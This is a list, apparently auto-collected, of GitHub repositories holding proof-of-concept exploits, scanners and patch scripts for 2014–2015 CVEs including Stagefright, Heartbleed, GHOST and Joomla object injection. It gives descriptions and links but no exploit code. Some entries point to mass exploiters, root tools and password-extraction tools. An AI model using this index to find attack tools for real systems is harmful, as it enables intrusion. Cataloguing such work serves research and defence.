**An exploit for CVE-2015-1538-1 - Google Stagefright ‘stsc’ MP4 Atom Integer Overflow Remote Code Execution** : [jduck/cve-2015-1538-1](https://api.github.com/repos/jduck/cve-2015-1538-1) create time: 2015-09-10T23:00:59Z

**Quick and dirty .py for checking (CVE-2015-1635) MS15-034 + DoS attack option** : [wiredaem0n/chk-ms15-034](https://api.github.com/repos/wiredaem0n/chk-ms15-034) create time: 2015-10-14T06:21:21Z

**None** : [sariyamelody/CVE-2015-5290](https://api.github.com/repos/sariyamelody/CVE-2015-5290) create time: 2015-10-11T19:55:28Z

**CVE-2015-3073 PoC** : [reigningshells/CVE-2015-3073](https://api.github.com/repos/reigningshells/CVE-2015-3073) create time: 2015-09-27T00:19:23Z

**CVE-2015-1157 telnet server** : [perillamint/CVE-2015-1157](https://api.github.com/repos/perillamint/CVE-2015-1157) create time: 2015-10-14T04:43:29Z

**Joomla! 3.2 to 3.4.4 - SQL Injection (CVE-2015-7297, CVE-2015-7857, and CVE-2015-7858)** : [CCrashBandicot/ContentHistory](https://api.github.com/repos/CCrashBandicot/ContentHistory) create time: 2015-11-02T03:03:35Z

**PoC code for vBulletin PreAuth vulnerability** : [Prajithp/CVE-2015-7808](https://api.github.com/repos/Prajithp/CVE-2015-7808) create time: 2015-11-06T19:47:46Z

**None** : [marZiiw/Stagefright_CVE-2015-1538-1](https://api.github.com/repos/marZiiw/Stagefright_CVE-2015-1538-1) create time: 2015-11-07T02:58:15Z

**None** : [kanpol/PoCForCVE-2015-1528](https://api.github.com/repos/kanpol/PoCForCVE-2015-1528) create time: 2015-11-14T06:11:53Z

**None** : [secmob/CVE-2015-6612](https://api.github.com/repos/secmob/CVE-2015-6612) create time: 2015-11-16T07:04:02Z

**Exploit for CVE-2015-6357 Cisco FireSIGHT Management Center Certificate Validation Vulnerability** : [mattimustang/firepwner](https://api.github.com/repos/mattimustang/firepwner) create time: 2015-11-16T10:15:47Z

**None** : [flankerhqd/cve-2015-6612poc-forM](https://api.github.com/repos/flankerhqd/cve-2015-6612poc-forM) create time: 2015-11-16T10:50:42Z

**A PoC for the Bamboo deserialization exploit** : [CallMeJonas/CVE-2015-6576](https://api.github.com/repos/CallMeJonas/CVE-2015-6576) create time: 2015-11-20T14:16:18Z

**Playbooks 'Fix for CVE-2015-0235(GHOST)' running on Ansible** : [F88/ghostbusters15](https://api.github.com/repos/F88/ghostbusters15) create time: 2015-01-29T12:52:45Z

**CVE-2015-3636 exploit ** : [android-rooting-tools/libpingpong_exploit](https://api.github.com/repos/android-rooting-tools/libpingpong_exploit) create time: 2015-10-07T12:54:57Z

**simple poc for cve-2015-5932 / cve-2015-5847 / cve-2015-5864** : [jndok/tpwn-bis](https://api.github.com/repos/jndok/tpwn-bis) create time: 2015-11-12T20:36:26Z

**Python script to generate a malicious MP4 file and start a CherryPy web server hosting a simple HTML page with the embedded file. Exploits another Stagefright vulnerability, the integer overflow (CVE-2015-3864).** : [eudemonics/scaredycat](https://api.github.com/repos/eudemonics/scaredycat) create time: 2015-12-08T18:27:52Z

**PoC code for 32 bit Android OS** : [fi01/CVE-2015-3636](https://api.github.com/repos/fi01/CVE-2015-3636) create time: 2015-09-12T01:31:36Z

**POC for CVE-2015-6620, AMessage unmarshal arbitrary write** : [flankerhqd/CVE-2015-6620-POC](https://api.github.com/repos/flankerhqd/CVE-2015-6620-POC) create time: 2015-12-16T03:09:30Z

**CVE-2015-7545 proof of concept** : [avuserow/bug-free-chainsaw](https://api.github.com/repos/avuserow/bug-free-chainsaw) create time: 2015-12-16T21:44:48Z

**None** : [cinno/CVE-2015-7755-POC](https://api.github.com/repos/cinno/CVE-2015-7755-POC) create time: 2016-01-09T22:49:07Z

**All versions of the Joomla! below 3.4.6 are known to be vulnerable. But exploitation is possible with PHP versions below 5.5.29, 5.6.13 and below 5.5.** : [ZaleHack/joomla_rce_CVE-2015-8562](https://api.github.com/repos/ZaleHack/joomla_rce_CVE-2015-8562) create time: 2016-01-04T13:37:25Z

**A proof of concept for Joomla's CVE-2015-8562 vulnerability** : [RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC](https://api.github.com/repos/RobinHoutevelts/Joomla-CVE-2015-8562-PHP-POC) create time: 2016-01-04T22:27:06Z

**None** : [securifera/CVE-2015-2900-Exploit](https://api.github.com/repos/securifera/CVE-2015-2900-Exploit) create time: 2016-01-06T18:34:44Z

**CVE-2015-8562 Exploit in bash** : [atcasanova/cve-2015-8562-exploit](https://api.github.com/repos/atcasanova/cve-2015-8562-exploit) create time: 2016-02-08T04:03:26Z

**None** : [Gitlabpro/The-analysis-of-the-cve-2015-8651](https://api.github.com/repos/Gitlabpro/The-analysis-of-the-cve-2015-8651) create time: 2016-02-12T09:28:05Z

**This app verifies if your device is still vulnerable to CVE-2015-3825 / CVE-2015-3837, aka "One Class to Rule Them All", by checking if it contains the vulnerable conscrypt's OpenSSLX509Certificate class. A patch was released in August 2015 by Google.** : [roeeh/conscryptchecker](https://api.github.com/repos/roeeh/conscryptchecker) create time: 2016-02-13T08:57:44Z

**None** : [betalphafai/CVE-2015-6640](https://api.github.com/repos/betalphafai/CVE-2015-6640) create time: 2016-02-15T08:13:20Z

**test script for CVE-2015-7547** : [cakuzo/CVE-2015-7547](https://api.github.com/repos/cakuzo/CVE-2015-7547) create time: 2016-02-17T00:51:22Z

**Small script to patch CVE-2015-7547** : [JustDenisYT/glibc-patcher](https://api.github.com/repos/JustDenisYT/glibc-patcher) create time: 2016-02-17T11:51:44Z

**glibc check and update in light of CVE-2015-7547** : [rexifiles/rex-sec-glibc](https://api.github.com/repos/rexifiles/rex-sec-glibc) create time: 2016-02-18T12:56:33Z

**None** : [betalphafai/CVE-2015-6637](https://api.github.com/repos/betalphafai/CVE-2015-6637) create time: 2016-02-18T14:39:04Z

**Proof of concept for CVE-2015-7547** : [fjserna/CVE-2015-7547](https://api.github.com/repos/fjserna/CVE-2015-7547) create time: 2016-02-10T21:13:54Z

** glibc getaddrinfo stack-based buffer overflow** : [babykillerblack/CVE-2015-7547](https://api.github.com/repos/babykillerblack/CVE-2015-7547) create time: 2016-02-21T20:21:43Z

**None** : [t0r0t0r0/CVE-2015-7547](https://api.github.com/repos/t0r0t0r0/CVE-2015-7547) create time: 2016-02-17T11:36:35Z

**CVE-2015-0235** : [alanmeyer/CVE-glibc](https://api.github.com/repos/alanmeyer/CVE-glibc) create time: 2016-02-25T23:23:34Z

**exploit for CVE-2015-0568** : [betalphafai/CVE-2015-0568](https://api.github.com/repos/betalphafai/CVE-2015-0568) create time: 2016-03-04T10:00:46Z

**CVE-2015-8299 Advisory and PoC** : [kernoelpanic/CVE-2015-8299](https://api.github.com/repos/kernoelpanic/CVE-2015-8299) create time: 2016-03-08T12:19:50Z

**Cve-2015-1538-1** : [niranjanshr13/Stagefright-cve-2015-1538-1](https://api.github.com/repos/niranjanshr13/Stagefright-cve-2015-1538-1) create time: 2016-03-20T20:20:06Z

**PoC exploit server for CVE-2015-7547** : [jgajek/cve-2015-7547](https://api.github.com/repos/jgajek/cve-2015-7547) create time: 2016-03-10T19:47:00Z

**just some research notes** : [HenryVHuang/CVE-2015-3864](https://api.github.com/repos/HenryVHuang/CVE-2015-3864) create time: 2016-09-30T03:39:14Z

**Infoleak and PC control poc for CVE-2015-6620 (24445127), I'll add after conference** : [flankerhqd/mediacodecoob](https://api.github.com/repos/flankerhqd/mediacodecoob) create time: 2016-03-29T09:01:52Z

**None** : [bittorrent3389/CVE-2015-8543_for_SLE12SP1](https://api.github.com/repos/bittorrent3389/CVE-2015-8543_for_SLE12SP1) create time: 2016-04-12T11:57:27Z

**Simple Exploit for Verification of CVE-2015-6606** : [michaelroland/omapi-cve-2015-6606-exploit](https://api.github.com/repos/michaelroland/omapi-cve-2015-6606-exploit) create time: 2016-01-19T16:16:22Z

**None** : [panyu6325/CVE-2015-1805](https://api.github.com/repos/panyu6325/CVE-2015-1805) create time: 2016-03-24T02:55:09Z

**PoC for CVE-2015-6086** : [payatu/CVE-2015-6086](https://api.github.com/repos/payatu/CVE-2015-6086) create time: 2016-01-18T11:32:41Z

**PoC attack server for CVE-2015-7547 buffer overflow vulnerability in glibc DNS stub resolver (public version)** : [eSentire/cve-2015-7547-public](https://api.github.com/repos/eSentire/cve-2015-7547-public) create time: 2016-04-05T13:50:28Z

**[Firefox] SOP bypass PoC for CVE-2015-7214 (MFSA 2015-149)** : [llamakko/CVE-2015-7214](https://api.github.com/repos/llamakko/CVE-2015-7214) create time: 2016-04-28T12:54:24Z

**None** : [securifera/CVE-2015-8277-Exploit](https://api.github.com/repos/securifera/CVE-2015-8277-Exploit) create time: 2016-05-02T13:47:15Z

**NSE plugin for Nmap that scans a DotNetNuke (DNN) web application for an Administration Authentication Bypass vulnerability (CVE-2015-2794, EDB-ID: 39777).** : [styx00/DNN_CVE-2015-2794](https://api.github.com/repos/styx00/DNN_CVE-2015-2794) create time: 2016-05-07T12:21:13Z

**Microsoft Office / COM Object DLL Planting ** : [hexx0r/CVE-2015-6132](https://api.github.com/repos/hexx0r/CVE-2015-6132) create time: 2016-05-14T14:17:15Z

**这个代码包含了CVE-2015-8660漏洞的利用代码,还有注释,出现问题的源代码,打了补丁后的代码** : [whu-enjoy/CVE-2015-8660](https://api.github.com/repos/whu-enjoy/CVE-2015-8660) create time: 2016-04-14T15:09:19Z

**MySQL DoS in the Procedure Analyse Function – CVE-2015-4870** : [OsandaMalith/CVE-2015-4870](https://api.github.com/repos/OsandaMalith/CVE-2015-4870) create time: 2016-05-30T04:18:12Z

**None** : [thejackerz/scanner-exploit-joomla-CVE-2015-8562](https://api.github.com/repos/thejackerz/scanner-exploit-joomla-CVE-2015-8562) create time: 2016-06-07T14:56:26Z

**None** : [FloatingGuy/cve-2015-1805](https://api.github.com/repos/FloatingGuy/cve-2015-1805) create time: 2016-06-30T02:13:26Z

**Exploit that extracts Qualcomm's KeyMaster keys using CVE-2015-6639 and CVE-2016-2431** : [laginimaineb/ExtractKeyMaster](https://api.github.com/repos/laginimaineb/ExtractKeyMaster) create time: 2016-06-30T11:56:44Z

**root with CVE-2015-3636** : [debugfan/rattle_root](https://api.github.com/repos/debugfan/rattle_root) create time: 2016-07-13T06:23:54Z

**Python script to exploit CVE-2015-4852.** : [roo7break/serialator](https://api.github.com/repos/roo7break/serialator) create time: 2016-03-03T18:33:17Z

**Crash PoC** : [Pray3r/CVE-2015-8088](https://api.github.com/repos/Pray3r/CVE-2015-8088) create time: 2015-12-09T07:18:41Z

** 翻译文章,CVE-2015-0057漏洞在32位和64位系统上的利用。Exploiting the win32k!xxxEnableWndSBArrows use-after-free (CVE 2015-0057) bug on both 32-bit and 64-bit(Aaron Adams of NCC )** : [55-AA/CVE-2015-0057](https://api.github.com/repos/55-AA/CVE-2015-0057) create time: 2016-08-30T06:11:59Z

**PoC of cve-2015-3839 which cause SMS app of Android Crash (DoS)** : [mabin004/cve-2015-3839_PoC](https://api.github.com/repos/mabin004/cve-2015-3839_PoC) create time: 2016-10-11T12:58:57Z

**None** : [bluebluelan/CVE-2015-7547-proj-master](https://api.github.com/repos/bluebluelan/CVE-2015-7547-proj-master) create time: 2016-11-10T08:49:13Z

**Expolit for android (goldfish kernel v3.10.0+) on arm64 with PXN&SELinux Bypassed. Based on fi01's code.** : [a7vinx/CVE-2015-3636](https://api.github.com/repos/a7vinx/CVE-2015-3636) create time: 2017-01-02T02:59:29Z

**Joomla 1.5 - 3.4.5 Object Injection RCE X-Forwarded-For header** : [paralelo14/CVE-2015-8562](https://api.github.com/repos/paralelo14/CVE-2015-8562) create time: 2017-01-08T12:59:16Z

**Script to extract malicious payload and decoy document from CVE-2015-1641 exploit documents** : [Cyberclues/rtf_exploit_extractor](https://api.github.com/repos/Cyberclues/rtf_exploit_extractor) create time: 2015-10-27T00:23:36Z

**CVE-2015-1635** : [u0pattern/Remove-IIS-RIIS](https://api.github.com/repos/u0pattern/Remove-IIS-RIIS) create time: 2017-01-28T16:26:54Z

**None** : [paralelo14/CVE-2015-1579](https://api.github.com/repos/paralelo14/CVE-2015-1579) create time: 2017-02-03T12:00:39Z

**None** : [theglife214/CVE-2015-5195](https://api.github.com/repos/theglife214/CVE-2015-5195) create time: 2017-03-04T01:41:58Z

**poc for CVE-2015-1855** : [vpereira/CVE-2015-1855](https://api.github.com/repos/vpereira/CVE-2015-1855) create time: 2017-03-14T16:01:46Z

**None** : [k0keoyo/CVE-2015-2546-Exploit](https://api.github.com/repos/k0keoyo/CVE-2015-2546-Exploit) create time: 2017-05-25T14:20:34Z

**CVE-2015-1635** : [bongbongco/MS15-034](https://api.github.com/repos/bongbongco/MS15-034) create time: 2017-06-29T04:38:25Z

**None** : [sUbc0ol/CVE-2015-0235](https://api.github.com/repos/sUbc0ol/CVE-2015-0235) create time: 2017-06-30T10:29:40Z

**MS15-034: HTTP.sys (IIS) DoS** : [limkokhole/CVE-2015-1635](https://api.github.com/repos/limkokhole/CVE-2015-1635) create time: 2018-08-02T11:28:14Z

**php_cve-2014-8142_cve-2015-0231的漏洞环境docker** : [3xp10it/php_cve-2014-8142_cve-2015-0231](https://api.github.com/repos/3xp10it/php_cve-2014-8142_cve-2015-0231) create time: 2017-07-09T06:06:28Z

**Automated Exploit Toolkit for CVE-2015-6095 and CVE-2016-0049** : [JackOfMostTrades/bluebox](https://api.github.com/repos/JackOfMostTrades/bluebox) create time: 2016-02-18T22:38:51Z

**None** : [ockeghem/CVE-2015-6835-checker](https://api.github.com/repos/ockeghem/CVE-2015-6835-checker) create time: 2015-12-19T07:55:53Z

**ProFTPd 1.3.5 - File Copy** : [davidtavarez/CVE-2015-3306](https://api.github.com/repos/davidtavarez/CVE-2015-3306) create time: 2017-07-29T04:31:10Z

**[discontinued] Mass exploiter of CVE 2015-8562 for Joomla! CMS** : [paralelo14/JoomlaMassExploiter](https://api.github.com/repos/paralelo14/JoomlaMassExploiter) create time: 2016-02-05T21:32:40Z

**CVE-2015-1805 root tool** : [dosomder/iovyroot](https://api.github.com/repos/dosomder/iovyroot) create time: 2016-04-01T12:10:14Z

**CVE-2015-0816 + CVE-2015-0802** : [Afudadi/Firefox-35-37-Exploit](https://api.github.com/repos/Afudadi/Firefox-35-37-Exploit) create time: 2018-01-10T11:21:36Z

**CVE-2015-4852 Oracle WebLogic Scanner** : [AndersonSingh/serialization-vulnerability-scanner](https://api.github.com/repos/AndersonSingh/serialization-vulnerability-scanner) create time: 2017-11-25T21:20:02Z

**Concurrent network scanner for CVE-2015-1635** : [technion/erlvulnscan](https://api.github.com/repos/technion/erlvulnscan) create time: 2015-05-04T09:40:29Z

**Sudo <= 1.8.14 Local Privilege Escalation and vulnerable container** : [t0kx/privesc-CVE-2015-5602](https://api.github.com/repos/t0kx/privesc-CVE-2015-5602) create time: 2017-12-16T00:23:30Z

**Win32k LPE vulnerability used in APT attack** : [hfiref0x/CVE-2015-1701](https://api.github.com/repos/hfiref0x/CVE-2015-1701) create time: 2015-05-12T18:04:48Z

**Modification of Metasploit module for RCE in Ruby-On-Rails Console CVE-2015-3224** : [0x00-0x00/CVE-2015-3224](https://api.github.com/repos/0x00-0x00/CVE-2015-3224) create time: 2018-02-08T23:24:48Z

**Elasticsearch 1.4.0 < 1.4.2 Remote Code Execution exploit and vulnerable container** : [t0kx/exploit-CVE-2015-1427](https://api.github.com/repos/t0kx/exploit-CVE-2015-1427) create time: 2017-01-09T20:08:56Z

**ProFTPd 1.3.5 - (mod_copy) Remote Command Execution exploit and vulnerable container** : [t0kx/exploit-CVE-2015-3306](https://api.github.com/repos/t0kx/exploit-CVE-2015-3306) create time: 2017-01-08T14:19:51Z

**A VENOM (CVE-2015-3456) Exploit / PoC written in C.** : [orf53975/poisonfrog](https://api.github.com/repos/orf53975/poisonfrog) create time: 2018-12-03T06:15:21Z

**Ruby on Rails Web Console (v2) Whitelist Bypass Code Execution implementation in Python** : [0xEval/cve-2015-3224](https://api.github.com/repos/0xEval/cve-2015-3224) create time: 2018-05-03T07:41:33Z

**Windows/Linux reproducer** : [Karm/CVE-2015-8710](https://api.github.com/repos/Karm/CVE-2015-8710) create time: 2016-03-17T10:32:52Z

**Demo for CVE-2015-3837.** : [itibs/IsildursBane](https://api.github.com/repos/itibs/IsildursBane) create time: 2018-05-17T08:47:48Z

**[discontinued] Mass exploiter of CVE-2015-1579 for WordPress CMS** : [paralelo14/WordPressMassExploiter](https://api.github.com/repos/paralelo14/WordPressMassExploiter) create time: 2016-02-03T21:44:11Z

**MS15-034 HTTP.sys 远程执行代码检测脚本(MS15-034 HTTP.sys remote execution code poc script)** : [aedoo/CVE-2015-1635-POC](https://api.github.com/repos/aedoo/CVE-2015-1635-POC) create time: 2018-06-20T14:28:11Z

**None** : [likescam/ShareDoc_cve-2015-5477](https://api.github.com/repos/likescam/ShareDoc_cve-2015-5477) create time: 2018-07-17T15:54:40Z

**None** : [dangokyo/CVE-2015-5119](https://api.github.com/repos/dangokyo/CVE-2015-5119) create time: 2018-08-21T12:31:49Z

**CVE-2015-5374 Denial of Service PoC** : [can/CVE-2015-5374-DoS-PoC](https://api.github.com/repos/can/CVE-2015-5374-DoS-PoC) create time: 2018-02-14T22:12:54Z

**POC ** : [yield-c/CVE2015-7576](https://api.github.com/repos/yield-c/CVE2015-7576) create time: 2018-09-04T09:19:41Z

**An exploitation tool to extract passwords using CVE-2015-5995.** : [shaheemirza/TendaSpill](https://api.github.com/repos/shaheemirza/TendaSpill) create time: 2018-10-04T18:20:47Z

**A root tool based on the [CVE-2015-1805 vulnerability](https://access.redhat.com/security/cve/cve-2015-1805) It supports 32 and 64bit, get sys call table address via swi.** : [mobilelinux/iovy_root_research](https://api.github.com/repos/mobilelinux/iovy_root_research) create time: 2018-10-31T10:26:15Z

**cve-2015-8103** : [cved-sources/cve-2015-8103](https://api.github.com/repos/cved-sources/cve-2015-8103) create time: 2019-01-06T22:01:09Z

**CVE-2015-2794 auto finder** : [wilsc0w/CVE-2015-2794-finder](https://api.github.com/repos/wilsc0w/CVE-2015-2794-finder) create time: 2019-01-20T12:48:36Z

**None** : [halkichi0308/CVE-2015-9251](https://api.github.com/repos/halkichi0308/CVE-2015-9251) create time: 2018-12-20T12:12:59Z

**cve-2015-5602** : [cved-sources/cve-2015-5602](https://api.github.com/repos/cved-sources/cve-2015-5602) create time: 2019-01-06T23:50:01Z

**cve-2015-1427** : [cved-sources/cve-2015-1427](https://api.github.com/repos/cved-sources/cve-2015-1427) create time: 2019-01-06T21:18:13Z

**cve-2015-3306** : [cved-sources/cve-2015-3306](https://api.github.com/repos/cved-sources/cve-2015-3306) create time: 2019-01-06T21:25:23Z

**loudong** : [miracle03/CVE-2015-7547-master](https://api.github.com/repos/miracle03/CVE-2015-7547-master) create time: 2019-06-04T03:24:21Z

**CVE-2015-3337 ElasticSearch 任意文件读取** : [jas502n/CVE-2015-3337](https://api.github.com/repos/jas502n/CVE-2015-3337) create time: 2019-06-21T09:06:49Z

**QSEE Privilege Escalation Exploit using PRDiag* commands (CVE-2015-6639)** : [laginimaineb/cve-2015-6639](https://api.github.com/repos/laginimaineb/cve-2015-6639) create time: 2016-05-02T12:18:57Z

**Exploitation and validation tool for CVE 2015-2080 AKA "JetBlead"** : [6a6f6a6f/CVE-2015-2080](https://api.github.com/repos/6a6f6a6f/CVE-2015-2080) create time: 2019-08-19T14:41:28Z

**ActiveMQ Deserialization RCE** : [jas502n/CVE-2015-5254](https://api.github.com/repos/jas502n/CVE-2015-5254) create time: 2019-08-30T06:03:51Z

**CVE-2015-7547 initial research.** : [Stick-U235/CVE-2015-7547](https://api.github.com/repos/Stick-U235/CVE-2015-7547) create time: 2019-10-24T15:02:23Z

**Adapted CVE-2015-8562 payload** : [xnorkl/Joomla_Payload](https://api.github.com/repos/xnorkl/Joomla_Payload) create time: 2020-02-07T14:11:27Z

**(CVE-2015-7501)JBoss JMXInvokerServlet 反序列化漏洞** : [ianxtianxt/CVE-2015-7501](https://api.github.com/repos/ianxtianxt/CVE-2015-7501) create time: 2020-02-21T05:23:08Z

**None** : [hackarada/cve-2015-3306](https://api.github.com/repos/hackarada/cve-2015-3306) create time: 2020-02-25T03:36:25Z

**Proof of concept Python tool to exploit RCE in Nibbleblog <4.0.5** : [VanTekken/CVE-2015-6967](https://api.github.com/repos/VanTekken/CVE-2015-6967) create time: 2020-02-10T18:10:09Z

**A proof of concept for Joomla's CVE-2015-8562 vulnerability (Object Injection RCE)** : [VoidSec/Joomla_CVE-2015-8562](https://api.github.com/repos/VoidSec/Joomla_CVE-2015-8562) create time: 2017-09-17T15:03:53Z

**A check for GHOST; cve-2015-0235** : [chayim/GHOSTCHECK-cve-2015-0235](https://api.github.com/repos/chayim/GHOSTCHECK-cve-2015-0235) create time: 2020-03-24T15:03:09Z

**Google Android - 'Stagefright' Remote Code Execution - CVE-2015-1538** : [Tharana/Android-vulnerability-exploitation](https://api.github.com/repos/Tharana/Android-vulnerability-exploitation) create time: 2020-05-11T11:34:27Z

**Exploit code for CVE-2015-5477 POC** : [xycloops123/TKEY-remote-DoS-vulnerability-exploit](https://api.github.com/repos/xycloops123/TKEY-remote-DoS-vulnerability-exploit) create time: 2020-05-11T18:01:09Z

**Glibc-Vulnerability-Exploit-CVE-2015-7547** : [Amilaperera12/Glibc-Vulnerability-Exploit-CVE-2015-7547](https://api.github.com/repos/Amilaperera12/Glibc-Vulnerability-Exploit-CVE-2015-7547) create time: 2020-05-12T14:32:41Z

**This is my SNP project where my ID is IT19366128** : [SR7-HACKING/LINUX-VULNERABILITY-CVE-2015-1328](https://api.github.com/repos/SR7-HACKING/LINUX-VULNERABILITY-CVE-2015-1328) create time: 2020-05-12T17:02:44Z

**Local Root vulnerability- CVE-2019-13272 / Security Bypass Vulnerability – CVE-2019-14287/Google Android - 'Stagefright' Remote Code Execution - CVE-2015-1538** : [Tharana/vulnerability-exploitation](https://api.github.com/repos/Tharana/vulnerability-exploitation) create time: 2020-05-12T17:59:48Z

**None** : [cdedmondson/Modified-CVE-2015-3306-Exploit](https://api.github.com/repos/cdedmondson/Modified-CVE-2015-3306-Exploit) create time: 2020-05-15T17:44:41Z

**None** : [cyberharsh/Groovy-scripting-engine-CVE-2015-1427](https://api.github.com/repos/cyberharsh/Groovy-scripting-engine-CVE-2015-1427) create time: 2020-06-22T05:00:22Z

**PoC exploit for CVE-2015-2291** : [Tare05/Intel-CVE-2015-2291](https://api.github.com/repos/Tare05/Intel-CVE-2015-2291) create time: 2020-02-22T13:27:16Z

**没有编写完成,以后学习更多知识在回来完善** : [guanjivip/CVE-2015-8562](https://api.github.com/repos/guanjivip/CVE-2015-8562) create time: 2020-07-25T07:05:28Z

**ActiveMQ_CVE-2015-5254** : [gsheller/ActiveMQ_CVE-2015-5254](https://api.github.com/repos/gsheller/ActiveMQ_CVE-2015-5254) create time: 2020-08-03T05:51:52Z

**CVE-2015-4852、CVE-2016-0638、CVE-2016-3510、CVE-2019-2890漏洞POC** : [zhzhdoai/Weblogic_Vuln](https://api.github.com/repos/zhzhdoai/Weblogic_Vuln) create time: 2020-08-10T09:17:04Z

**Un semplice exploit che sfrutta CVE-2015-7297, CVE-2015-7857 and CVE-2015-7858 per elencare gli utenti con la psw del db** : [kally-life/exploit-joomla](https://api.github.com/repos/kally-life/exploit-joomla) create time: 2020-09-12T19:44:41Z

**None** : [nex1less/CVE-2015-4852](https://api.github.com/repos/nex1less/CVE-2015-4852) create time: 2020-11-16T05:30:04Z

**PoC for CVE-2015_1427** : [h3inzzz/cve2015_1427](https://api.github.com/repos/h3inzzz/cve2015_1427) create time: 2020-12-21T15:02:55Z

**Converted with tweaks from a metasploit module as an exercise for OSCP studying and exploit development** : [cd6629/CVE-2015-3306-Python-PoC](https://api.github.com/repos/cd6629/CVE-2015-3306-Python-PoC) create time: 2020-10-16T19:58:13Z

**Java deserialization exploit for elasticsearch 1.5.2 CVE-2015-5377** : [fierobot/elasticsearch_CVE-2015-5377](https://api.github.com/repos/fierobot/elasticsearch_CVE-2015-5377) create time: 2020-12-28T21:30:22Z

**A2SV = Auto Scanning to SSL Vulnerability HeartBleed, CCS Injection, SSLv3 POODLE, FREAK... etc Support Vulnerability [CVE-2007-1858] Anonymous Cipher [CVE-2012-4929] CRIME(SPDY) [CVE-2014-0160] CCS Injection [CVE-2014-0224] HeartBleed [CVE-2014-3566] SSLv3 POODLE [CVE-2015-0204] FREAK Attack [CVE-2015-4000] LOGJAM Attack [CVE-2016-0800] SSLv2 DROWN Installation : $ apt update && apt upgrade $ apt install git $ apt install python2 $ apt install python $ git clone https://github.com/hahwul/ a2sv $ cd a2sv $ chmod +x * $ pip2 install -r requirements.txt usage : $ python2 a2sv.py -h It shows all commands how we can use this tool $ python a2sv.py -t 127.0.0.1 127.0.0.1 = target means here own device** : [nyc-tophile/A2SV--SSL-VUL-Scan](https://api.github.com/repos/nyc-tophile/A2SV--SSL-VUL-Scan) create time: 2021-01-01T12:26:08Z

**None** : [justinsteven/sudo_digest_toctou_poc_CVE-2015-8239](https://api.github.com/repos/justinsteven/sudo_digest_toctou_poc_CVE-2015-8239) create time: 2021-01-15T03:14:02Z

**Notes, binaries, and related information from analysis of the CVE-2015-7755 & CVE-2015-7756 issues within Juniper ScreenOS** : [hdm/juniper-cve-2015-7755](https://api.github.com/repos/hdm/juniper-cve-2015-7755) create time: 2015-12-18T20:20:01Z

**PoC for cve-2015-5347** : [alexanderkjall/wicker-cve-2015-5347](https://api.github.com/repos/alexanderkjall/wicker-cve-2015-5347) create time: 2021-01-30T16:11:29Z

**PoC for CVE-2015-1769** : [int0/CVE-2015-1769](https://api.github.com/repos/int0/CVE-2015-1769) create time: 2021-02-17T03:25:53Z

**Nibbleblog 4.0.3 - Arbitrary File Upload (CVE-2015-6967)** : [dix0nym/CVE-2015-6967](https://api.github.com/repos/dix0nym/CVE-2015-6967) create time: 2021-02-25T21:57:24Z

**CVE-2015-3224 ** : [xda3m00n/CVE-2015-3224-](https://api.github.com/repos/xda3m00n/CVE-2015-3224-) create time: 2021-02-27T19:47:14Z

**Demonstrating that SSLVerifySignedServerKeyExchange() is trivially testable.** : [landonf/Testability-CVE-2014-1266](https://api.github.com/repos/landonf/Testability-CVE-2014-1266) create time: 2014-02-22T17:39:21Z

**Patch iOS SSL vulnerability (CVE-2014-1266)** : [linusyang/SSLPatch](https://api.github.com/repos/linusyang/SSLPatch) create time: 2014-02-23T18:37:24Z

**Apple OS X/iOS SSL flaw demonstration** : [gabrielg/CVE-2014-1266-poc](https://api.github.com/repos/gabrielg/CVE-2014-1266-poc) create time: 2014-02-24T07:48:45Z

**Test websites for Heartbleed vulnerability (CVE 2014-0160)** : [iwaffles/heartbleed-test.crx](https://api.github.com/repos/iwaffles/heartbleed-test.crx) create time: 2014-04-08T20:52:22Z

**openssl Heart Bleed Exploit: CVE-2014-0160 Mass Security Auditor** : [fb1h2s/CVE-2014-0160](https://api.github.com/repos/fb1h2s/CVE-2014-0160) create time: 2014-04-08T22:29:55Z

**Chrome extension that automatically checks visited sites for vulnerability to OpenSSL CVE-2014-0160** : [roganartu/heartbleedchecker-chrome](https://api.github.com/repos/roganartu/heartbleedchecker-chrome) create time: 2014-04-09T00:41:04Z

**Test script for test 1Password database for SSL Hea(r)t Bleeding (CVE-2014-0160)** : [idkqh7/heatbleeding](https://api.github.com/repos/idkqh7/heatbleeding) create time: 2014-04-13T05:52:43Z

**CVE-2014-160 exploit** : [menrcom/CVE-2014-160](https://api.github.com/repos/menrcom/CVE-2014-160) create time: 2014-04-09T19:28:06Z

**Exploit for CVE-2014-160 (heartbleed) with required patch for libopenssl** : [GitMirar/heartbleed_exploit](https://api.github.com/repos/GitMirar/heartbleed_exploit) create time: 2014-04-09T23:33:33Z

**Checks for vulnerabilities: CVE-2014-0160 ** : [zouguangxian/heartbleed](https://api.github.com/repos/zouguangxian/heartbleed) create time: 2014-04-09T05:29:36Z

**Test CIDR blocks for CVE-2014-0160/Heartbleed** : [amerine/coronary](https://api.github.com/repos/amerine/coronary) create time: 2014-04-10T02:28:05Z

**None** : [ice-security88/CVE-2014-0160](https://api.github.com/repos/ice-security88/CVE-2014-0160) create time: 2014-04-10T04:27:10Z

**None** : [obayesshelton/CVE-2014-0160-Scanner](https://api.github.com/repos/obayesshelton/CVE-2014-0160-Scanner) create time: 2014-04-08T14:22:36Z

**CVE-2014-0160 mass test against subdomains** : [siddolo/knockbleed](https://api.github.com/repos/siddolo/knockbleed) create time: 2014-04-10T17:12:53Z

**OpenSSL Heartbleed (CVE-2014-0160) Fix script** : [sammyfung/openssl-heartbleed-fix](https://api.github.com/repos/sammyfung/openssl-heartbleed-fix) create time: 2014-04-10T19:47:42Z

**OpenSSL TLS heartbeat read overrun (CVE-2014-0160)** : [isgroup-srl/openmagic](https://api.github.com/repos/isgroup-srl/openmagic) create time: 2014-04-08T20:58:26Z

**This repo contains a script to automatically test sites for vulnerability to the Heartbleed Bug (CVE-2014-0160) based on the input file for the urls.** : [waqasjamal-zz/HeartBleed-Vulnerability-Checker](https://api.github.com/repos/waqasjamal-zz/HeartBleed-Vulnerability-Checker) create time: 2014-04-10T11:42:33Z

**A firefox extension and checker for CVE-2014-0160** : [proactiveRISK/heartbleed-extention](https://api.github.com/repos/proactiveRISK/heartbleed-extention) create time: 2014-04-09T21:20:56Z

**CVE-2014-0160 scanner** : [a0726h77/heartbleed-test](https://api.github.com/repos/a0726h77/heartbleed-test) create time: 2014-04-11T14:24:54Z

**Nmap NSE script that discovers/exploits Heartbleed/CVE-2014-0160** : [takeshixx/ssl-heartbleed.nse](https://api.github.com/repos/takeshixx/ssl-heartbleed.nse) create time: 2014-04-08T23:39:17Z

